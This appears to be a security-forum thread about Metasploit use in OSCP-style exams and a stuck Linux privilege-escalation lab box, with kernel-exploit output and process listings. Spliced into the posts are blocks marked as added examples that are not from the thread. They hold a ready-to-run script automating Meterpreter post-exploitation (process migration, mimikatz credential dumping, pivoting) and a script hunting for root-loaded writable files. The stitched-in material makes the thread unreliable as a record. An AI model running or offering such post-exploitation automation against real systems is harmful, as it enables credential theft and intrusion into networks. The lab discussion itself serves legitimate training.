spankmeister
Jun 15, 2008








Slippery Tilde

Achmed Jones posted:

You don't need meterpreter for anything on the exam. You can use it if you really want, but it's by no means necessary. If you really need it, you goofed

True, but there is no reason to limit yourself if you're smart about it. If there is a machine that you're struggling with and you know there's a module that does what you're trying to do effortlessly you can save yourself a lot of time.

There's no shame in using it if you think you need to. Just make drat sure to choose wisely.


CyberPingu
Sep 15, 2013

Ready To Ruck!





Achmed Jones posted:

You don't need meterpreter for anything on the exam. You can use it if you really want, but it's by no means necessary. If you really need it, you goofed

I'd use it for a quick win if I'm near my time limit and need a quick win on the last box.

I'm gonna try to avoid it as everything in there has another script somewhere. Or at least I've found so far anyway.

wolrah
May 8, 2006
what?


astral posted:

Loved that one of those classic Mac OS "Desktop Security" programs was called Foolproof and simply disabling extensions was enough to stop it.
I had forgotten the name of the one I ran in to most but that was it! I guess its name was accurate in a way, it was resistant to total fools but anyone else who wanted to could get past it pretty easily.

RFC2324
Jun 7, 2012

Http 418


CyberPingu posted:

I'd use it for a quick win if I'm near my time limit and need a quick win on the last box.

I'm gonna try to avoid it as everything in there has another script somewhere. Or at least I've found so far anyway.

I thought all it was is a collection of external scripts brought together in one handy tool?

CyberPingu
Sep 15, 2013

Ready To Ruck!





RFC2324 posted:

I thought all it was is a collection of external scripts brought together in one handy tool?

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e.g. target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

CyberPingu fucked around with this message at 14:46 on Sep 3, 2020

RFC2324
Jun 7, 2012

Http 418


CyberPingu posted:

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e.g. target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

Didn't realize they had to be Ruby modules, but the rest is what I would expect from a tool that unifies a bunch of scripts: for the scripts to be modified to accept variables passed from the command line (and hence passed from the organization tool)

spankmeister
Jun 15, 2008








Slippery Tilde

RFC2324 posted:

I thought all it was is a collection of external scripts brought together in one handy tool?

It is that but meterpreter is very powerful since it automates away a lot of things for you. When you get a session established you can attempt several local privilege escalation methods automatically, migrate the process away from the unstable exploited process to a more stable one, load modules in memory like mimikatz, open up port forwards for pivoting to other networks, etc.

All of which you can do manually, but it's just plumbed together really well and very easy to use. Way less error prone etc. Which is a plus when it's 4AM and you're tired.

I'm not some kind of metasploit fanboy or anything but it definitely gets dunked on way too much because some people say it's not 1337 enough or whatever.
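The post-exploitation chain described above (migrate, try the local privesc suggester, load the in-memory credential extension, set up pivoting), as an added example that is not from the thread or from Metasploit's own documentation: a POSIX sh function that writes a msfconsole resource script tying those steps to an existing Meterpreter session, and runs it if msfconsole is installed. The session id, pivot host and subnet are placeholders.

```shell
#!/bin/sh
# Added example, not from the thread. Writes a msfconsole resource script that
# chains the post-exploitation steps above against an existing Meterpreter
# session, then runs it if msfconsole is on PATH.
#
# Usage: write_post_rc <session-id> <pivot-host> <pivot-subnet> <out-file>
write_post_rc() {
    sid=$1 pivot=$2 subnet=$3 out=$4
    cat > "$out" <<EOF
# Generated resource script: msfconsole -q -r $out
# 1. Move out of the exploited process first; if it crashes, the session goes with it.
use post/windows/manage/migrate
set SESSION $sid
run
# 2. Check the host against the local privesc modules instead of trying them by hand.
use post/multi/recon/local_exploit_suggester
set SESSION $sid
run
# 3. Load the in-memory credential extension (kiwi is the current name of the mimikatz extension).
sessions -i $sid -C "load kiwi"
# 4. Pivot: route the internal subnet through the session and forward one port for a local client.
use post/multi/manage/autoroute
set SESSION $sid
set SUBNET $subnet
set NETMASK 255.255.255.0
run
sessions -i $sid -C "portfwd add -l 13389 -p 3389 -r $pivot"
EOF
}

# Placeholder session id and addresses; adjust to the engagement.
rc=${TMPDIR:-/tmp}/post_session.rc
write_post_rc 1 10.10.10.5 10.10.10.0 "$rc"
if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc"
else
    printf 'msfconsole not found; resource script written to %s\n' "$rc"
fi
```

The ordering is the point: migrating before anything else is what keeps the session alive when the exploited process is unstable, and the suggester only reads the target, so it is safe to run before you decide which escalation to attempt.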

Wiggly Wayne DDS
Sep 11, 2010





Nap Ghost

only time i'll dump on metasploit and variants are where they're used in training courses to do payload generation, etc with no attempt to show how to write your own

CyberPingu
Sep 15, 2013

Ready To Ruck!





Wiggly Wayne DDS posted:

only time i'll dump on metasploit and variants are where they're used in training courses to do payload generation, etc with no attempt to show how to write your own

That's not training people really, it's teaching them to be script kiddies.

It's why I really like IppSec's stuff, as if they do use MS they then show you a way not using it too

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

That's not training people really, it's teaching them to be script kiddies.

It's why I really like IppSec's stuff, as if they do use MS they then show you a way not using it too

MS is a means to an end. It really depends on what you are doing. I find it's better to understand the issue of why the exploit even works so you can tell blue team how to prevent an issue like this from being an issue in the first place!

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

MS is a means to an end. It really depends on what you are doing. I find it's better to understand the issue of why the exploit even works so you can tell blue team how to prevent an issue like this from being an issue in the first place!

Don't get me wrong, it's a great tool. Especially for time based poo poo like CTFs. But personally, if I was building Pen Test training I'd try to stay away from it until the course covers how the exploits work. It's pointless getting someone to run Eternal Blue in a test environment without them understanding the whys and hows, as that's not teaching someone properly how to look for things.

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

Don't get me wrong, it's a great tool. Especially for time based poo poo like CTFs. But personally, if I was building Pen Test training I'd try to stay away from it until the course covers how the exploits work. It's pointless getting someone to run Eternal Blue in a test environment without them understanding the whys and hows, as that's not teaching someone properly how to look for things.

and the dangers of running random exploits on systems.

Don't forget that most of the NSA Exploits have something like a 45% BSOD rate.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

and the dangers of running random exploits on systems.

Don't forget that most of the NSA Exploits have something like a 45% BSOD rate.

Yep,

Again, if you are pentesting, you are basically never going to use any of the DoS exploits in MS either, but if you haven't been taught the difference between remote code execution and denial of service, you are just going to run whatever MS shows as a "match" for your search.

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

Yep,

Again, if you are pentesting, you are basically never going to use any of the DoS exploits in MS either, but if you haven't been taught the difference between remote code execution and denial of service, you are just going to run whatever MS shows as a "match" for your search.

Well... The RCEs can cause DoS in most of the service/kernel level exploits. MS17-010 loves to BSOD boxes that have been running too long.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

Well... The RCEs can cause DoS in most of the service/kernel level exploits. MS17-010 loves to BSOD boxes that have been running too long.

Yeah, I meant explicit denial of service attacks. Not accidental ones

MS17 does warn you that it can do that though. Which I always found funny, that exploit code comes with a usage warning

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e g target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

Had to do that for an iDRAC exploit; it had hard-coded IP/PORT in the C code that got cross-compiled for another processor (it's the same processor as the Dreamcast!). Kali didn't have GCC for it anymore. Had to spin up an old Debian VM and hand-compile it, then edit the crap out of the Python script to skip the compile and just send it the ELF I had hand-compiled.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

Had to do that for an iDRAC exploit; it had hard-coded IP/PORT in the C code that got cross-compiled for another processor (it's the same processor as the Dreamcast!). Kali didn't have GCC for it anymore. Had to spin up an old Debian VM and hand-compile it, then edit the crap out of the Python script to skip the compile and just send it the ELF I had hand-compiled.

Amazing.

Balsa
May 10, 2020

Turbo Nerd



My DA Path for that pentest was iDrac>Esxi>Old Windows Template>Extract Local Admin Password>Unused, scan network for ssh>found vsphere ssh with that password>clone DC into a new VM>extract krbtgt hash>Create domain admin user using golden ticket -- One of the more interesting pens

the exploit was CVE-2018-1207

I do other hacking shenanigans over at https://www.youtube.com/watch?v=PtCk3OMeV5g

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

My DA Path for that pentest was iDrac>Esxi>Old Windows Template>Extract Local Admin Password>Unused, scan network for ssh>found vsphere ssh with that password>clone DC into a new VM>extract krbtgt hash>Create domain admin user using golden ticket -- One of the more interesting pens

the exploit was CVE-2018-1207

That's cool. There's always a reused password somewhere. Or a VM that hasn't been removed.

RFC2324
Jun 7, 2012

Http 418


Balsa posted:

and the dangers of running random exploits on systems.

Last time I played with metasploit I saw the "hail mary" button and started cackling

Achmed Jones
Oct 16, 2004









Shredded Hen

spankmeister posted:

True, but there is no reason to limit yourself if you're smart about it. If there is a machine that you're struggling with and you know there's a module that does what you're trying to do effortlessly you can save yourself a lot of time.

There's no shame in using it if you think you need to. Just make drat sure to choose wisely.

my point is that the boxes they use on the exam are designed such that there's not going to be meterpreter win buttons. you don't have to strategize around this or "make drat sure to choose wisely" because the exams are designed not to be "lol did you pick the right module".

e: iirc you were allowed to use meterpreter as your payload as many times as you want, but could only use its modules (or non-meterpreter metasploit modules) once. i could be 100% misremembering that part though

e2: forgot the word "once" lol

Achmed Jones fucked around with this message at 15:36 on Sep 5, 2020

Mopp
Oct 29, 2004



I'm trying to do a couple of OSCP-like boxes, but I'm stuck at privesc on a particularly difficult box.

code:
Linux version 4.13.0-21-generic (buildd@lgw01-amd64-037) (gcc version 7.2.0 (Ubuntu 7.2.0-8ubuntu3)) #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017       
This kernel should be vulnerable to https://github.com/brl/grlh, but I can't get it to work. The BPF flags are correct.
code:
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8be0e1a22600
[*] Leaking sock struct from ffff8be0c1609000
[!] failed to find sk_rcvtimeo.
Other than that, there are two things that stand out on the box.

1. My low priv user is a member of ubuntu group.
2. PHP is running a DNS server with some other weird PHP program.
3. I have a valid user account and am logged in using telnet. SSH is patched and certs only.

I can't find any writeable files with the ubuntu group, and I can't find any SUID/SGID/cron/etc misconfigurations that can be used. I have a hint on the box, and that is that a software exploit is the way to get root.

Output from ps:
code:
_chrony   1768  0.0  0.0 105564   360 ?        S    Sep02   0:00 /usr/sbin/chronyd
daemon     821  0.0  0.0  28328   208 ?        Ss   Sep02   0:00 /usr/sbin/atd -f
message+   974  0.0  0.1  50172  1184 ?        Ss   Sep02   0:04 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only0  0.3  76764  1884 ?        Ss   07:29   0:00 /lib/systemd/systemd --user
root         1  0.0  0.5 225540  3012 ?        Ss   Sep02   0:11 /sbin/init
root       393  0.0  0.8 185320  5016 ?        D<s  Sep02   0:55 /lib/systemd/systemd-journald
root       406  0.0  0.0 105900   184 ?        Ss   Sep02   0:00 /sbin/lvmetad -f
root       414  0.0  0.4  44516  2532 ?        Ss   Sep02   0:03 /lib/systemd/systemd-udevd
root       834  0.0  1.3 170832  7804 ?        Ssl  Sep02   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       844  0.0  1.0 310548  6456 ?        Ss   Sep02   0:31 php /usr/bin/php-dns
root       862  0.0  0.0  31744   300 ?        Ss   Sep02   0:00 /usr/sbin/cron -f
root       875  0.0  0.1  70684   840 ?        Ss   Sep02   0:02 /lib/systemd/systemd-logind
root      1133  0.0  0.2 295004  1376 ?        Ssl  Sep02   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1186  0.0  0.0  16412   144 ttyS0    Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root      1246  0.0  0.0  14888   132 tty1     Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1580  0.0  2.6  79860 15632 ?        Ss   Sep02   0:10 /usr/bin/python3 /usr/bin/google_network_daemon
root      1582  0.0  2.6  79860 15692 ?        Ss   Sep02   0:15 /usr/bin/python3 /usr/bin/google_accounts_daemon
root      1583  0.0  2.5  79660 15356 ?        Ss   Sep02   0:08 /usr/bin/python3 /usr/bin/google_clock_skew_daemon
root      1594  0.0  0.1  72296   760 ?        Ss   Sep02   0:00 /usr/sbin/sshd -D
root      3771  0.0  0.0  19348   216 ?        Ss   07:29   0:00 in.telnetd: ::ffff:10.0.0.2
root      3772  0.0  0.0  80820   576 pts/0    Ss   07:29   0:00 login -h ::ffff:10.0.0.2 -p
root     15644  0.0  0.0   4552    60 ?        Ss   08:27   0:00 /usr/sbin/acpid
syslog    1036  0.0  0.3 263044  1996 ?        Ssl  Sep02   0:24 /usr/sbin/rsyslogd -n
systemd+   649  0.0  0.1  71848   944 ?        Ss   Sep02   0:00 /lib/systemd/systemd-networkd
systemd+   665  0.0  0.1  70760   856 ?        Ss   Sep02   0:18 /lib/systemd/systemd-resolved
uuidd    15685  0.0  0.0  28596   184 ?        Ss   08:27   0:00 /usr/sbin/uuidd --socket-activation
www-data  1426  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
www-data  1427  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
ss:
code:
/tmp$ ss -lt
State            Recv-Q             Send-Q                          Local Address:Port                           Peer Address:Port            
LISTEN           0                  128                             127.0.0.53%lo:domain                              0.0.0.0:*               
LISTEN           0                  128                                   0.0.0.0:ssh                                 0.0.0.0:*               
LISTEN           0                  128                                      [::]:ssh                                    [::]:*               
LISTEN           0                  128                                         *:telnet                                    *:*       
The priv esc shouldn't be that difficult, so maybe I've missed something in my enumeration. If you have any tips on the PHP part, I'll gladly take them.

siggy2021
Mar 8, 2010


Mopp posted:

I'm trying to do a couple of OSCP-like boxes, but I'm stuck at privesc on a particularly difficult box.

code:
Linux version 4.13.0-21-generic (buildd@lgw01-amd64-037) (gcc version 7.2.0 (Ubuntu 7.2.0-8ubuntu3)) #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017       
This kernel should be vulnerable to https://github.com/brl/grlh, but I can't get it to work. The BPF flags are correct.
code:
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8be0e1a22600
[*] Leaking sock struct from ffff8be0c1609000
[!] failed to find sk_rcvtimeo.
Other than that, there are two things that stand out on the box.

1. My low priv user is a member of ubuntu group.
2. PHP is running a DNS server with some other weird PHP program.
3. I have a valid user account and am logged in using telnet. SSH is patched and certs only.

I can't find any writeable files with the ubuntu group, and I can't find any SUID/SGID/cron/etc misconfigurations that can be used. I have a hint on the box, and that is that a software exploit is the way to get root.

Output from ps:
code:
_chrony   1768  0.0  0.0 105564   360 ?        S    Sep02   0:00 /usr/sbin/chronyd
daemon     821  0.0  0.0  28328   208 ?        Ss   Sep02   0:00 /usr/sbin/atd -f
message+   974  0.0  0.1  50172  1184 ?        Ss   Sep02   0:04 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only0  0.3  76764  1884 ?        Ss   07:29   0:00 /lib/systemd/systemd --user
root         1  0.0  0.5 225540  3012 ?        Ss   Sep02   0:11 /sbin/init
root       393  0.0  0.8 185320  5016 ?        D<s  Sep02   0:55 /lib/systemd/systemd-journald
root       406  0.0  0.0 105900   184 ?        Ss   Sep02   0:00 /sbin/lvmetad -f
root       414  0.0  0.4  44516  2532 ?        Ss   Sep02   0:03 /lib/systemd/systemd-udevd
root       834  0.0  1.3 170832  7804 ?        Ssl  Sep02   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       844  0.0  1.0 310548  6456 ?        Ss   Sep02   0:31 php /usr/bin/php-dns
root       862  0.0  0.0  31744   300 ?        Ss   Sep02   0:00 /usr/sbin/cron -f
root       875  0.0  0.1  70684   840 ?        Ss   Sep02   0:02 /lib/systemd/systemd-logind
root      1133  0.0  0.2 295004  1376 ?        Ssl  Sep02   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1186  0.0  0.0  16412   144 ttyS0    Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root      1246  0.0  0.0  14888   132 tty1     Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1580  0.0  2.6  79860 15632 ?        Ss   Sep02   0:10 /usr/bin/python3 /usr/bin/google_network_daemon
root      1582  0.0  2.6  79860 15692 ?        Ss   Sep02   0:15 /usr/bin/python3 /usr/bin/google_accounts_daemon
root      1583  0.0  2.5  79660 15356 ?        Ss   Sep02   0:08 /usr/bin/python3 /usr/bin/google_clock_skew_daemon
root      1594  0.0  0.1  72296   760 ?        Ss   Sep02   0:00 /usr/sbin/sshd -D
root      3771  0.0  0.0  19348   216 ?        Ss   07:29   0:00 in.telnetd: ::ffff:10.0.0.2
root      3772  0.0  0.0  80820   576 pts/0    Ss   07:29   0:00 login -h ::ffff:10.0.0.2 -p
root     15644  0.0  0.0   4552    60 ?        Ss   08:27   0:00 /usr/sbin/acpid
syslog    1036  0.0  0.3 263044  1996 ?        Ssl  Sep02   0:24 /usr/sbin/rsyslogd -n
systemd+   649  0.0  0.1  71848   944 ?        Ss   Sep02   0:00 /lib/systemd/systemd-networkd
systemd+   665  0.0  0.1  70760   856 ?        Ss   Sep02   0:18 /lib/systemd/systemd-resolved
uuidd    15685  0.0  0.0  28596   184 ?        Ss   08:27   0:00 /usr/sbin/uuidd --socket-activation
www-data  1426  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
www-data  1427  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
ss:
code:
/tmp$ ss -lt
State            Recv-Q             Send-Q                          Local Address:Port                           Peer Address:Port            
LISTEN           0                  128                             127.0.0.53%lo:domain                              0.0.0.0:*               
LISTEN           0                  128                                   0.0.0.0:ssh                                 0.0.0.0:*               
LISTEN           0                  128                                      [::]:ssh                                    [::]:*               
LISTEN           0                  128                                         *:telnet                                    *:*       
The priv esc shouldn't be that difficult, so maybe I've missed something in my enumeration. If you have any tips on the PHP part, I'll gladly take them.

Nothing in there is jumping out at me right away, but it's also late and I'm lying in bed looking at it on my phone. Can you give any context on what this is from? Is it an OSCP lab box? HTB? Vulnhub?

If you can throw me what it's on and it's something I can access I may take a stab at trying it out and doing some enumeration.

Mopp
Oct 29, 2004



siggy2021 posted:

Nothing in there is jumping out at me right away, but it's also late and I'm lying in bed looking at it on my phone. Can you give any context on what this is from? Is it an OSCP lab box? HTB? Vulnhub?

If you can throw me what it's on and it's something I can access I may take a stab at trying it out and doing some enumeration.

The box is from a free ethical hacking course at a local school. So it's an OSCP-like lab network, and I have the general goals and hints for how to get the flags on each box. On this particular one it's privilege escalation by software exploit.


I'll go over it again and see if something pops out, otherwise I'll leave it for a week and get back to it later.

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

`file /usr/bin/php-dns` and `cat /usr/bin/php-dns`, anything? it is likely php source.

Mopp
Oct 29, 2004



Biowarfare posted:

`file /usr/bin/php-dns` and `cat /usr/bin/php-dns`, anything? it is likely php source.

Yeah, seems to be running https://github.com/yswery/PHP-DNS-SERVER.

code:
$ cat /usr/bin/php-dns
#!/usr/bin/env php
# vi:ft=php.jinja2
<?php

function expand_tilde($path) {
  if (function_exists('posix_getuid') && strpos($path, '~') !== false) {
    $info = posix_getpwuid(posix_getuid());
    $path = str_replace('~', $info['dir'], $path);
  }
  return $path;
}

require_once expand_tilde("~/.composer/vendor/autoload.php");

$record_file = '/etc/php-dns/dns_records.json';

// JsonResolver created and provided with path to file with json dns records
$jsonResolver = new yswery\DNS\Resolver\JsonResolver([$record_file]);

// System resolver acting as a fallback to the JsonResolver
$systemResolver = new yswery\DNS\Resolver\SystemResolver();

// StackableResolver will try each resolver in order and return the first match
$stackableResolver = new yswery\DNS\Resolver\StackableResolver([$jsonResolver, $systemResolver]);

// Create the eventDispatcher and add the event subscribers
$eventDispatcher = new \Symfony\Component\EventDispatcher\EventDispatcher();
$eventDispatcher->addSubscriber(new \yswery\DNS\Event\Subscriber\EchoLogger());
$eventDispatcher->addSubscriber(new \yswery\DNS\Event\Subscriber\ServerTerminator());

// Create a new instance of Server class
$server = new yswery\DNS\Server($stackableResolver, $eventDispatcher, '0.0.0.0', 53);

// Start DNS server
$server->start();

edit:

Well, I can read the Google Cloud cfg file and the ubuntu user is locked. No joy there.
code:
system_info:
   # This will affect which distro class gets used
   distro: ubuntu
   # Default user name + that default users groups (if added/used)
   default_user:
     name: ubuntu
     lock_passwd: True
     gecos: Ubuntu
     groups: [adm, audio, cdrom, dialout, dip, floppy, lxd, netdev, plugdev, sudo, video]
     sudo: ["ALL=(ALL) NOPASSWD:ALL"]
     shell: /bin/bash
I found that screen is an exploitable version (4.06) but lacks suid so no joy.

So only current lead is PHP.

There is a binary in the profile path, but not sure on how to exploit it if possible.

code:
$ cat /etc/profile.d/composer.sh 
export PATH=$PATH:~/.composer/vendor/bin

Mopp fucked around with this message at 11:34 on Sep 6, 2020

Achmed Jones
Oct 16, 2004









Shredded Hen

Composer is a PHP dependency manager. I don't know of any exploits in it that would be helpful, unless you can perhaps abuse its search path to load your code

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

spankmeister
Jun 15, 2008








Slippery Tilde

Mopp posted:

I'm trying to do a couple of OSCP-like boxes, but I'm stuck at privesc on a particularly difficult box.




Kernel exploits are generally the last thing I would try to do tbh. That php-dns thing looks VERY suspicious so I would definitely focus on that.

spankmeister fucked around with this message at 21:36 on Sep 6, 2020

Mopp
Oct 29, 2004



Subjunctive posted:

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

Yeah, I've combed this box multiple times now and this is the only thing that sticks out. No idea on how to attack the script, and since neither that nor PHP is SUID it might be best to go at the source code itself. Feels a bit hardcore for this CTF though, there are no reported vulnerabilities for PHP-DNS.

CyberPingu
Sep 15, 2013

Ready To Ruck!





That sounds a lot harder than most of the OSCP-like boxes I've done.

xtal
Jan 9, 2011



Subjunctive posted:

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

Yeah, I mean, there is no reason to hand write the expand tilde code, there are library functions for that and it may even work when passed straight into require. Moreover, it's looking at the UID when the tilde should be looking at HOME. I would bet very much that the issue is in that function.

edit: that function also breaks with multiple tildes, when the tilde isn't the first character, or when the directory separators aren't lined up

xtal fucked around with this message at 20:21 on Sep 7, 2020

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

xtal posted:

Yeah, I mean, there is no reason to hand write the expand tilde code, there are library functions for that and it may even work when passed straight into require. Moreover, it's looking at the UID when the tilde should be looking at HOME. I would bet very much that the issue is in that function.

edit: that function also breaks with multiple tildes, when the tilde isn't the first character, or when the directory separators aren't lined up

it looks at the UID to call the getpw stuff and then the ["dir"] key. I've never seen tilde expansion for home directories work when the tilde isn't the first character. /tmp/~user/thing shouldn't expand to /tmp/home/user/thing, for example

require doesn't expand tildes on its own, and I don't know of a library function that does other than the ones that work their way out to shell execution. what do you have in mind?

xtal
Jan 9, 2011



Subjunctive posted:

it looks at the UID to call the getpw stuff and then the ["dir"] key. I've never seen tilde expansion for home directories work when the tilde isn't the first character. /tmp/~user/thing shouldn't expand to /tmp/home/user/thing, for example

require doesn't expand tildes on its own, and I don't know of a library function that does other than the ones that work their way out to shell execution. what do you have in mind?

So, I googled this to find out, and the code here is exactly the same:

https://compwright.com/2013-09-03/t...pansion-in-php/

As for your example about tilde expansion, I'm agreeing with you, but the provided function that uses str_replace would replace the tilde no matter where it is and no matter how many times it occurs. I was thinking there must be a library function that handles tilde expansion in a way that accounts for those edge cases. Maybe realpath?

E: The strpos call is checking for one tilde at the start, but that's all.

xtal fucked around with this message at 20:56 on Sep 7, 2020

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

xtal posted:

Maybe realpath?

afaik realpath just deals with symlinks and . or .. path components. I think POSIX only acknowledges tilde expansion within shell commands, and has nothing to say that open("~thing/foo") is different from open("./~thing/foo")

xtal
Jan 9, 2011



Since I have the most experience with Ruby I was looking toward File.expand_path, which does work for home directories. But since it's just copied from somewhere else anyway, it may be a red herring. That snippet is at least 7 years old though, so maybe there are some bugs with it that you can research.

EVIL Gibson
Mar 23, 2001

Internet of Things is just someone else's computer that people can't help attaching cameras and door locks to!


Switchblade Switcharoo

xtal posted:

So, I googled this to find out, and the code here is exactly the same:

https://compwright.com/2013-09-03/t...pansion-in-php/

As for your example about tilde expansion, I'm agreeing with you, but the provided function that uses str_replace would replace the tilde no matter where it is and no matter how many times it occurs. I was thinking there must be a library function that handles tilde expansion in a way that accounts for those edge cases. Maybe realpath?

E: The strpos call is checking for one tilde at the start, but that's all.

Composer file and PHP dns might be related

There was an exploit where composer doesn't check the validity of the download source

https://cxsecurity.com/issue/WLB-2015050082


This is usually done by arp spoofing but maybe you can do something cool with phpdns since you can change the DNS json config file via command line.

spankmeister
Jun 15, 2008








Slippery Tilde

This all seems a bit convoluted for the average OSCP-like boot2root VM. It should be simpler than that I would think.

CyberPingu
Sep 15, 2013

Ready To Ruck!





spankmeister posted:

This all seems a bit convoluted for the average OSCP-like boot2root VM. It should be simpler than that I would think.

Yeah that's what I've been thinking too. Like, it's not the worst idea to do boxes that are tougher than the OSCP ones. But you might end up overthinking the exam when you get in.


Achmed Jones
Oct 16, 2004









Shredded Hen

I'm guessing it's not actually that involved and something's been overlooked. Maybe ~/.composer/vendor/autoload.php is world writeable in /root and was missed, for example
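The guess above (a writable autoload.php under /root) is checkable rather than guessable: a root process that does require_once on a path gives you a chain of path components, and a write bit on any one of them, or on a parent directory, is code execution as root. As an added example that is not from the thread, a POSIX sh script that (1) resolves the posted expand_tilde() the way the root-run php-dns would, including the replace-every-tilde behaviour xtal pointed out, and (2) walks each component of the resulting paths and reports which ones the current user can write to. The php-dns and composer.sh paths are the ones in Mopp's posts; /root as root's home is an assumption, and the script only reports, it modifies nothing.

```shell
#!/bin/sh
# Added example (not from the thread). Reproduces the posted expand_tilde()
# and checks whether the current user can write to anything a root-run
# php-dns (or a root shell using /etc/profile.d/composer.sh) would load from.
# Run as the low-privilege user on the target.

# str_replace('~', $info['dir'], $path) replaces EVERY tilde, so a path such
# as '/srv/~backup' gets mangled too. $2 is the home of the process owner
# (root for php-dns), not $HOME of whoever runs this. Assumes no '|' or '&' in $2.
expand_tilde_like_php() {
    printf '%s\n' "$1" | sed "s|~|$2|g"
}

# Walk each component of $1 and print "WRITABLE <component>" for every one the
# current user can write to. A writable parent directory is enough: you can
# rename the child away and drop your own file in its place even when the
# child itself is read-only. Sticky, world-writable directories you don't own
# (/tmp) are skipped because they don't let you replace other users' files.
writable_components() {
    cur=''
    old_ifs=$IFS
    set -f                      # no glob expansion while splitting on '/'
    IFS=/
    set -- $1                   # a leading '/' yields an empty first field
    IFS=$old_ifs
    set +f
    for part in "$@"; do
        [ -z "$part" ] && continue
        cur="$cur/$part"
        [ -e "$cur" ] || break  # missing component: its parent was already checked
        if [ -w "$cur" ]; then
            if [ -d "$cur" ] && [ -k "$cur" ] && [ ! -O "$cur" ]; then
                continue
            fi
            printf 'WRITABLE %s\n' "$cur"
        fi
    done
    return 0
}

# Paths from the posted /usr/bin/php-dns and /etc/profile.d/composer.sh,
# resolved as the root-owned daemon (and a root shell) would see them.
root_home=$(getent passwd 0 2>/dev/null | cut -d: -f6)
root_home=${root_home:-/root}   # assumption if getent is unavailable
for p in '~/.composer/vendor/autoload.php' '~/.composer/vendor/bin' \
         /etc/php-dns/dns_records.json /usr/bin/php-dns; do
    resolved=$(expand_tilde_like_php "$p" "$root_home")
    printf '== %s\n' "$resolved"
    writable_components "$resolved"
done
```

On a sane box this prints the four resolved paths and nothing under them; the walk stops at the first component it cannot stat, so a 700 /root simply ends the check. Any WRITABLE line is the thing to look at next, and a writable directory matters as much as a writable file.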
